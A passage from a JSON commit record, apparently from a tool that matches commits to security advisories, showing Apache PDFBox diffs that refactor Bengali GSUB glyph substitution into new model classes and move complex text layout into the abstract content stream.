is active.", + "+ */", + "+ String getActiveScriptName();", + "+", + "+ boolean isFeatureSupported(String featureName);", + "+", + "+ ScriptFeature getFeature(String featureName);", + "+", + "+ Set getSupportedFeatures();", + "+", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/model/Language.java b/fontbox/src/main/java/org/apache/fontbox/ttf/model/Language.java", + "new file mode 100644", + "index 000000000..9e360813d", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/model/Language.java", + "@@ -0,0 +1,55 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.model;", + "+", + "+import org.apache.fontbox.ttf.gsub.GsubWorker;", + "+import org.apache.fontbox.ttf.gsub.GsubWorkerFactory;", + "+import org.apache.fontbox.ttf.table.common.ScriptRecord;", + "+", + "+/**", + "+ * Enumerates the languages supported for GSUB operation. In order to support a new language, you", + "+ * need to add it here and then implement the {@link GsubWorker} for the given language and return", + "+ * the same from the", + "+ * {@link GsubWorkerFactory#getGsubWorker(org.apache.fontbox.ttf.CmapLookup, GsubData)}", + "+ *", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public enum Language", + "+{", + "+", + "+ BENGALI(new String[] { \"bng2\", \"beng\" });", + "+", + "+ private final String[] scriptNames;", + "+", + "+ private Language(String[] scriptNames)", + "+ {", + "+ this.scriptNames = scriptNames;", + "+ }", + "+", + "+ /**", + "+ * ScriptNames form the basis of identification of the language. This method gets the ScriptNames that the given", + "+ * Language supports, in the order of preference, Index 0 being the most preferred. These names should match the", + "+ * {@link ScriptRecord} in the GSUB system.", + "+ */", + "+ public String[] getScriptNames()", + "+ {", + "+ return scriptNames;", + "+ }", + "+", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedGsubData.java b/fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedGsubData.java", + "new file mode 100644", + "index 000000000..a795588ca", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedGsubData.java", + "@@ -0,0 +1,82 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.model;", + "+", + "+import java.util.List;", + "+import java.util.Map;", + "+import java.util.Set;", + "+", + "+/**", + "+ * ", + "+ * A {@link Map} based simple implementation of the {@link GsubData}", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class MapBackedGsubData implements GsubData", + "+{", + "+", + "+ private final Language language;", + "+ private final String activeScriptName;", + "+ private final Map, Integer>> glyphSubstitutionMap;", + "+", + "+ public MapBackedGsubData(Language language, String activeScriptName,", + "+ Map, Integer>> glyphSubstitutionMap)", + "+ {", + "+ this.language = language;", + "+ this.activeScriptName = activeScriptName;", + "+ this.glyphSubstitutionMap = glyphSubstitutionMap;", + "+ }", + "+", + "+ @Override", + "+ public Language getLanguage()", + "+ {", + "+ return language;", + "+ }", + "+", + "+ @Override", + "+ public String getActiveScriptName()", + "+ {", + "+ return activeScriptName;", + "+ }", + "+", + "+ @Override", + "+ public boolean isFeatureSupported(String featureName)", + "+ {", + "+ return glyphSubstitutionMap.containsKey(featureName);", + "+ }", + "+", + "+ @Override", + "+ public ScriptFeature getFeature(String featureName)", + "+ {", + "+ if (!isFeatureSupported(featureName))", + "+ {", + "+ throw new UnsupportedOperationException(", + "+ \"The feature \" + featureName + \" is not supported!\");", + "+ }", + "+", + "+ return new MapBackedScriptFeature(featureName, glyphSubstitutionMap.get(featureName));", + "+ }", + "+", + "+ @Override", + "+ public Set getSupportedFeatures()", + "+ {", + "+ return glyphSubstitutionMap.keySet();", + "+ }", + "+", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedScriptFeature.java b/fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedScriptFeature.java", + "new file mode 100644", + "index 000000000..ba2791c14", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedScriptFeature.java", + "@@ -0,0 +1,122 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.model;", + "+", + "+import java.util.List;", + "+import java.util.Map;", + "+import java.util.Set;", + "+", + "+/**", + "+ * ", + "+ * A {@link Map} based simple implementation of the {@link ScriptFeature}", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class MapBackedScriptFeature implements ScriptFeature", + "+{", + "+", + "+ private final String name;", + "+ private final Map, Integer> featureMap;", + "+", + "+ public MapBackedScriptFeature(String name, Map, Integer> featureMap)", + "+ {", + "+ this.name = name;", + "+ this.featureMap = featureMap;", + "+ }", + "+", + "+ @Override", + "+ public String getName()", + "+ {", + "+ return name;", + "+ }", + "+", + "+ @Override", + "+ public Set> getAllGlyphIdsForSubstitution()", + "+ {", + "+ return featureMap.keySet();", + "+ }", + "+", + "+ @Override", + "+ public boolean canReplaceGlyphs(List glyphIds)", + "+ {", + "+ return featureMap.containsKey(glyphIds);", + "+ }", + "+", + "+ @Override", + "+ public Integer getReplacementForGlyphs(List glyphIds)", + "+ {", + "+ if (!canReplaceGlyphs(glyphIds))", + "+ {", + "+ throw new UnsupportedOperationException(", + "+ \"The glyphs \" + glyphIds + \" cannot be replaced\");", + "+ }", + "+ return featureMap.get(glyphIds);", + "+ }", + "+", + "+ @Override", + "+ public int hashCode()", + "+ {", + "+ final int prime = 31;", + "+ int result = 1;", + "+ result = prime * result + ((featureMap == null) ? 0 : featureMap.hashCode());", + "+ result = prime * result + ((name == null) ? 0 : name.hashCode());", + "+ return result;", + "+ }", + "+", + "+ @Override", + "+ public boolean equals(Object obj)", + "+ {", + "+ if (this == obj)", + "+ {", + "+ return true;", + "+ }", + "+ if (obj == null)", + "+ {", + "+ return false;", + "+ }", + "+ if (getClass() != obj.getClass())", + "+ {", + "+ return false;", + "+ }", + "+ MapBackedScriptFeature other = (MapBackedScriptFeature) obj;", + "+ if (featureMap == null)", + "+ {", + "+ if (other.featureMap != null)", + "+ {", + "+ return false;", + "+ }", + "+ }", + "+ else if (!featureMap.equals(other.featureMap))", + "+ {", + "+ return false;", + "+ }", + "+ if (name == null)", + "+ {", + "+ if (other.name != null)", + "+ {", + "+ return false;", + "+ }", + "+ }", + "+ else if (!name.equals(other.name))", + "+ {", + "+ return false;", + "+ }", + "+ return true;", + "+ }", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/model/ScriptFeature.java b/fontbox/src/main/java/org/apache/fontbox/ttf/model/ScriptFeature.java", + "new file mode 100644", + "index 000000000..1efad551b", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/model/ScriptFeature.java", + "@@ -0,0 +1,42 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.model;", + "+", + "+import java.util.List;", + "+import java.util.Set;", + "+", + "+import org.apache.fontbox.ttf.table.common.FeatureRecord;", + "+", + "+/**", + "+ * Models a {@link FeatureRecord}", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public interface ScriptFeature", + "+{", + "+", + "+ String getName();", + "+", + "+ Set> getAllGlyphIdsForSubstitution();", + "+", + "+ boolean canReplaceGlyphs(List glyphIds);", + "+", + "+ Integer getReplacementForGlyphs(List glyphIds);", + "+", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/model/package.html b/fontbox/src/main/java/org/apache/fontbox/ttf/model/package.html", + "new file mode 100644", + "index 000000000..4878a8b2f", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/model/package.html", + "@@ -0,0 +1,25 @@", + "+", + "+", + "+", + "+", + "+", + "+", + "+", + "+This package contains a more logical model for the various font tables like GSUB.", + "+", + "+", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "index 50be140c1..af71274ee 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "@@ -27,3 +27,2 @@ import java.util.HashSet;", + " import java.util.List;", + "-import java.util.Map;", + " import java.util.Set;", + "@@ -37,3 +36,4 @@ import org.apache.fontbox.ttf.gsub.CompoundCharacterTokenizer;", + " import org.apache.fontbox.ttf.gsub.GsubWorker;", + "-import org.apache.fontbox.ttf.gsub.GsubWorkerForBengali;", + "+import org.apache.fontbox.ttf.gsub.GsubWorkerFactory;", + "+import org.apache.fontbox.ttf.model.GsubData;", + " import org.apache.pdfbox.contentstream.PDAbstractContentStream;", + "@@ -332,8 +332,7 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " PDType0Font pdType0Font = (PDType0Font) font;", + "- Map, Integer>> glyphSubstitutionMap = pdType0Font", + "- .getGlyphSubstitutionMap();", + "- if (!glyphSubstitutionMap.isEmpty())", + "+ GsubData gsubData = pdType0Font.getGsubData();", + "+ if (gsubData != GsubData.NO_DATA_FOUND)", + " {", + " Set glyphIds = new HashSet<>();", + "- encodedText = encodeForGsub(glyphSubstitutionMap, glyphIds, pdType0Font, text);", + "+ encodedText = encodeForGsub(gsubData, glyphIds, pdType0Font, text);", + " if (pdType0Font.willBeSubset())", + "@@ -1179,3 +1178,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + "- private byte[] encodeForGsub(Map, Integer>> glyphSubstitutionMap,", + "+ private byte[] encodeForGsub(GsubData gsubData,", + " Set glyphIds, PDType0Font font, String text) throws IOException", + "@@ -1199,3 +1198,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- glyphIds.addAll(applyGSUBRules(out, font, glyphSubstitutionMap, word));", + "+ glyphIds.addAll(applyGSUBRules(out, font, gsubData, word));", + " }", + "@@ -1207,4 +1206,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " private List applyGSUBRules(ByteArrayOutputStream out, PDType0Font font,", + "- Map, Integer>> glyphSubstitutionMap, String word)", + "- throws IOException", + "+ GsubData gsubData, String word) throws IOException", + " {", + "@@ -1225,7 +1223,7 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + "- // TODO: figure out how to get this language-specific detail up here", + "- GsubWorker gsubWorker = new GsubWorkerForBengali(cmapLookup, glyphSubstitutionMap);", + "+ GsubWorkerFactory gsubWorkerFactory = new GsubWorkerFactory();", + "- List repositionedGlyphIds = gsubWorker.repositionGlyphs(originalGlyphIds);", + "- List glyphIdsAfterGsub = gsubWorker.substituteGlyphs(repositionedGlyphIds);", + "+ GsubWorker gsubWorker = gsubWorkerFactory.getGsubWorker(cmapLookup, gsubData);", + "+", + "+ List glyphIdsAfterGsub = gsubWorker.applyTransforms(originalGlyphIds);", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "index cd205868e..f0e623931 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "@@ -22,6 +22,3 @@ import java.io.IOException;", + " import java.io.InputStream;", + "-import java.util.Collections;", + " import java.util.HashSet;", + "-import java.util.List;", + "-import java.util.Map;", + " import java.util.Set;", + "@@ -34,2 +31,3 @@ import org.apache.fontbox.ttf.TTFParser;", + " import org.apache.fontbox.ttf.TrueTypeFont;", + "+import org.apache.fontbox.ttf.model.GsubData;", + " import org.apache.fontbox.util.BoundingBox;", + "@@ -54,3 +52,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", + " private final Set noUnicode = new HashSet<>(); ", + "- private final Map, Integer>> glyphSubstitutionMap;", + "+ private final GsubData gsubData;", + " private final CmapLookup cmapLookup;", + "@@ -72,3 +70,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", + "- glyphSubstitutionMap = Collections.emptyMap();", + "+ gsubData = GsubData.NO_DATA_FOUND;", + " cmapLookup = null;", + "@@ -106,3 +104,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", + "- glyphSubstitutionMap = ttf.getGlyphSubstitutionMap();", + "+ gsubData = ttf.getGsubData();", + " cmapLookup = ttf.getUnicodeCmapLookup();", + "@@ -601,5 +599,5 @@ public class PDType0Font extends PDFont implements PDVectorFont", + "- public Map, Integer>> getGlyphSubstitutionMap()", + "+ public GsubData getGsubData()", + " {", + "- return glyphSubstitutionMap;", + "+ return gsubData;", + " }" + ], + "changed_files": [ + "fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerFactory.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/model/GsubData.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/model/Language.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedGsubData.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedScriptFeature.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/model/ScriptFeature.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/model/package.html", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "05eea58ba2735a191592c134c942cf46204cc3f6", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525935005, + "hunks": 32, + "message": "PDFBOX-4068: don't override \"common\" functionality - abstract content stream must track subsetting git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831310 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "index 7dd2030c4..8140a4496 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "@@ -20,2 +20,3 @@ import java.awt.Color;", + " import java.awt.geom.AffineTransform;", + "+import java.io.ByteArrayOutputStream;", + " import java.io.Closeable;", + "@@ -24,4 +25,19 @@ import java.io.OutputStream;", + " import java.text.NumberFormat;", + "+import java.util.ArrayList;", + "+import java.util.HashMap;", + "+import java.util.HashSet;", + "+import java.util.List;", + " import java.util.Locale;", + "+import java.util.Map;", + "+import java.util.Set;", + " import java.util.Stack;", + "+import java.util.regex.Pattern;", + "+", + "+import org.apache.commons.logging.Log;", + "+import org.apache.commons.logging.LogFactory;", + "+import org.apache.fontbox.ttf.CmapLookup;", + "+import org.apache.fontbox.ttf.gsub.CompoundCharacterTokenizer;", + "+import org.apache.fontbox.ttf.gsub.GsubWorker;", + "+import org.apache.fontbox.ttf.gsub.GsubWorkerFactory;", + "+import org.apache.fontbox.ttf.model.GsubData;", + " import org.apache.pdfbox.cos.COSBase;", + "@@ -32,2 +48,3 @@ import org.apache.pdfbox.pdmodel.documentinterchange.markedcontent.PDPropertyLis", + " import org.apache.pdfbox.pdmodel.font.PDFont;", + "+import org.apache.pdfbox.pdmodel.font.PDType0Font;", + " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", + "@@ -46,2 +63,3 @@ import org.apache.pdfbox.pdmodel.graphics.shading.PDShading;", + " import org.apache.pdfbox.pdmodel.graphics.state.PDExtendedGraphicsState;", + "+import org.apache.pdfbox.pdmodel.graphics.state.RenderingMode;", + " import org.apache.pdfbox.util.Charsets;", + "@@ -57,2 +75,6 @@ abstract class PDAbstractContentStream implements Closeable", + " {", + "+ private static final Log LOG = LogFactory.getLog(PDAbstractContentStream.class);", + "+", + "+ protected final PDDocument document; // may be null", + "+", + " protected final OutputStream outputStream;", + "@@ -70,9 +92,15 @@ abstract class PDAbstractContentStream implements Closeable", + "+ private final Map gsubWorkers = new HashMap<>();", + "+ private final GsubWorkerFactory gsubWorkerFactory = new GsubWorkerFactory();", + "+", + " /**", + " * Create a new appearance stream.", + "- * ", + "+ *", + "+ * @param document may be null", + " * @param outputStream The appearances output stream to write to.", + "+ * @param resources The resources to use", + " */", + "- PDAbstractContentStream(OutputStream outputStream, PDResources resources)", + "+ PDAbstractContentStream(PDDocument document, OutputStream outputStream, PDResources resources)", + " {", + "+ this.document = document;", + " this.outputStream = outputStream;", + "@@ -147,2 +175,28 @@ abstract class PDAbstractContentStream implements Closeable", + "+ // keep track of fonts which are configured for subsetting", + "+ if (font.willBeSubset())", + "+ {", + "+ if (document != null)", + "+ {", + "+ document.getFontsToSubset().add(font);", + "+ }", + "+ else", + "+ {", + "+ LOG.warn(\"attempting to use subset font \" + font.getName() + \" without proper context\");", + "+ }", + "+ }", + "+", + "+ // complex text layout", + "+ if (font instanceof PDType0Font)", + "+ {", + "+ PDType0Font pdType0Font = (PDType0Font) font;", + "+ GsubData gsubData = pdType0Font.getGsubData();", + "+ if (gsubData != GsubData.NO_DATA_FOUND)", + "+ {", + "+ GsubWorker gsubWorker = gsubWorkerFactory.getGsubWorker(pdType0Font.getCmapLookup(),", + "+ gsubData);", + "+ gsubWorkers.put((PDType0Font) font, gsubWorker);", + "+ }", + "+ }", + "+", + " writeOperand(resources.add(font));", + "@@ -221,2 +275,25 @@ abstract class PDAbstractContentStream implements Closeable", + "+ // complex text layout", + "+ byte[] encodedText = null;", + "+ if (font instanceof PDType0Font)", + "+ {", + "+", + "+ GsubWorker gsubWorker = gsubWorkers.get(font);", + "+ if (gsubWorker != null)", + "+ {", + "+ PDType0Font pdType0Font = (PDType0Font) font;", + "+ Set glyphIds = new HashSet<>();", + "+ encodedText = encodeForGsub(gsubWorker, glyphIds, pdType0Font, text);", + "+ if (pdType0Font.willBeSubset())", + "+ {", + "+ pdType0Font.addGlyphsToSubset(glyphIds);", + "+ }", + "+ }", + "+ }", + "+", + "+ if (encodedText == null)", + "+ {", + "+ encodedText = font.encode(text);", + "+ }", + "+", + " // Unicode code points to keep when subsetting", + "@@ -232,3 +309,3 @@ abstract class PDAbstractContentStream implements Closeable", + "- COSWriter.writeString(font.encode(text), outputStream);", + "+ COSWriter.writeString(encodedText, outputStream);", + " }", + "@@ -1536,2 +1613,84 @@ abstract class PDAbstractContentStream implements Closeable", + " }", + "+", + "+ /**", + "+ * Set the text rendering mode. This determines whether showing text shall cause glyph outlines", + "+ * to be stroked, filled, used as a clipping boundary, or some combination of the three.", + "+ *", + "+ * @param rm The text rendering mode.", + "+ * @throws IOException If the content stream could not be written.", + "+ */", + "+ public void setRenderingMode(RenderingMode rm) throws IOException", + "+ {", + "+ writeOperand(rm.intValue());", + "+ writeOperator(\"Tr\");", + "+ }", + "+", + "+ /**", + "+ * Set the text rise value, i.e. move the baseline up or down. This is useful for drawing", + "+ * superscripts or subscripts.", + "+ *", + "+ * @param rise Specifies the distance, in unscaled text space units, to move the baseline up or", + "+ * down from its default location. 0 restores the default location.", + "+ * @throws IOException", + "+ */", + "+ public void setTextRise(float rise) throws IOException", + "+ {", + "+ writeOperand(rise);", + "+ writeOperator(\"Ts\");", + "+ }", + "+", + "+ private byte[] encodeForGsub(GsubWorker gsubWorker,", + "+ Set glyphIds, PDType0Font font, String text) throws IOException", + "+ {", + "+", + "+ String spaceRegexPattern = \"\\\\s\";", + "+ Pattern spaceRegex = Pattern.compile(spaceRegexPattern);", + "+", + "+ // break the entire chunk of text into words by splitting it with space", + "+ List words = new CompoundCharacterTokenizer(\"\\\\s\").tokenize(text);", + "+", + "+ ByteArrayOutputStream out = new ByteArrayOutputStream();", + "+", + "+ for (String word : words)", + "+ {", + "+ if (spaceRegex.matcher(word).matches())", + "+ {", + "+ out.write(font.encode(word));", + "+ }", + "+ else", + "+ {", + "+ glyphIds.addAll(applyGSUBRules(gsubWorker, out, font, word));", + "+ }", + "+ }", + "+", + "+ return out.toByteArray();", + "+ }", + "+", + "+ private List applyGSUBRules(GsubWorker gsubWorker, ByteArrayOutputStream out, PDType0Font font, String word) throws IOException", + "+ {", + "+ List originalGlyphIds = new ArrayList<>();", + "+ CmapLookup cmapLookup = font.getCmapLookup();", + "+", + "+ // convert characters into glyphIds", + "+ for (char unicodeChar : word.toCharArray())", + "+ {", + "+ int glyphId = cmapLookup.getGlyphId(unicodeChar);", + "+ if (glyphId <= 0)", + "+ {", + "+ throw new IllegalStateException(", + "+ \"could not find the glyphId for the character: \" + unicodeChar);", + "+ }", + "+ originalGlyphIds.add(glyphId);", + "+ }", + "+", + "+ List glyphIdsAfterGsub = gsubWorker.applyTransforms(originalGlyphIds);", + "+", + "+ for (Integer glyphId : glyphIdsAfterGsub)", + "+ {", + "+ out.write(font.encodeGlyphId(glyphId));", + "+ }", + "+", + "+ return glyphIdsAfterGsub;", + "+", + "+ }", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "index ce4ef3305..a4dfc0e26 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "@@ -58,3 +58,3 @@ public final class PDAppearanceContentStream extends PDAbstractContentStream imp", + " {", + "- super(outputStream, appearance.getResources());", + "+ super(null, outputStream, appearance.getResources());", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", + "index e95a6a0af..276e63e9c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", + "@@ -36,3 +36,3 @@ public final class PDFormContentStream extends PDAbstractContentStream", + " {", + "- super(form.getContentStream().createOutputStream(), form.getResources());", + "+ super(null, form.getContentStream().createOutputStream(), form.getResources());", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "index bb98b7ff7..f5307183c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "@@ -20,3 +20,2 @@ import java.awt.geom.AffineTransform;", + " import java.awt.geom.PathIterator;", + "-import java.io.ByteArrayOutputStream;", + " import java.io.Closeable;", + "@@ -24,9 +23,2 @@ import java.io.IOException;", + " import java.io.OutputStream;", + "-import java.util.ArrayList;", + "-import java.util.HashMap;", + "-import java.util.HashSet;", + "-import java.util.List;", + "-import java.util.Map;", + "-import java.util.Set;", + "-import java.util.regex.Pattern;", + "@@ -34,7 +26,2 @@ import org.apache.commons.logging.Log;", + " import org.apache.commons.logging.LogFactory;", + "-import org.apache.fontbox.ttf.CmapLookup;", + "-import org.apache.fontbox.ttf.gsub.CompoundCharacterTokenizer;", + "-import org.apache.fontbox.ttf.gsub.GsubWorker;", + "-import org.apache.fontbox.ttf.gsub.GsubWorkerFactory;", + "-import org.apache.fontbox.ttf.model.GsubData;", + " import org.apache.pdfbox.cos.COSArray;", + "@@ -42,7 +29,4 @@ import org.apache.pdfbox.cos.COSBase;", + " import org.apache.pdfbox.cos.COSName;", + "-import org.apache.pdfbox.pdfwriter.COSWriter;", + " import org.apache.pdfbox.pdmodel.common.PDStream;", + " import org.apache.pdfbox.pdmodel.documentinterchange.markedcontent.PDPropertyList;", + "-import org.apache.pdfbox.pdmodel.font.PDFont;", + "-import org.apache.pdfbox.pdmodel.font.PDType0Font;", + " import org.apache.pdfbox.pdmodel.graphics.PDXObject;", + "@@ -56,4 +40,2 @@ import org.apache.pdfbox.pdmodel.graphics.image.PDImageXObject;", + " import org.apache.pdfbox.pdmodel.graphics.image.PDInlineImage;", + "-import org.apache.pdfbox.pdmodel.graphics.state.PDExtendedGraphicsState;", + "-import org.apache.pdfbox.pdmodel.graphics.state.RenderingMode;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", + "@@ -100,7 +82,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + "- private final PDDocument document;", + "-", + "- private final Map gsubWorkers = new HashMap<>();", + "- private final GsubWorkerFactory gsubWorkerFactory = new GsubWorkerFactory();", + "-", + " /**", + "@@ -160,3 +137,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- super(stream.createOutputStream(compress ? COSName.FLATE_DECODE : null), resources);", + "+ super(document, stream.createOutputStream(compress ? COSName.FLATE_DECODE : null), resources);", + "@@ -168,4 +145,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + "- this.document = document;", + "-", + " // If request specifies the need to append/prepend to the document", + "@@ -256,47 +231,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- super(outputStream, appearance.getResources());", + "- this.document = doc;", + "- ", + "- //setResources(appearance.getResources());", + "- }", + "-", + "- /**", + "- * Set the font and font size to draw text with.", + "- *", + "- * @param font The font to use.", + "- * @param fontSize The font size to draw the text.", + "- * @throws IOException If there is an error writing the font information.", + "- */", + "- @Override", + "- public void setFont(PDFont font, float fontSize) throws IOException", + "- {", + "- if (fontStack.isEmpty())", + "- {", + "- fontStack.add(font);", + "- }", + "- else", + "- {", + "- fontStack.setElementAt(font, fontStack.size() - 1);", + "- }", + "- ", + "- if (font.willBeSubset())", + "- {", + "- document.getFontsToSubset().add(font);", + "- }", + "- ", + "- if (font instanceof PDType0Font)", + "- {", + "- PDType0Font pdType0Font = (PDType0Font) font;", + "- GsubData gsubData = pdType0Font.getGsubData();", + "- if (gsubData != GsubData.NO_DATA_FOUND)", + "- {", + "- GsubWorker gsubWorker = gsubWorkerFactory.getGsubWorker(pdType0Font.getCmapLookup(),", + "- gsubData);", + "- 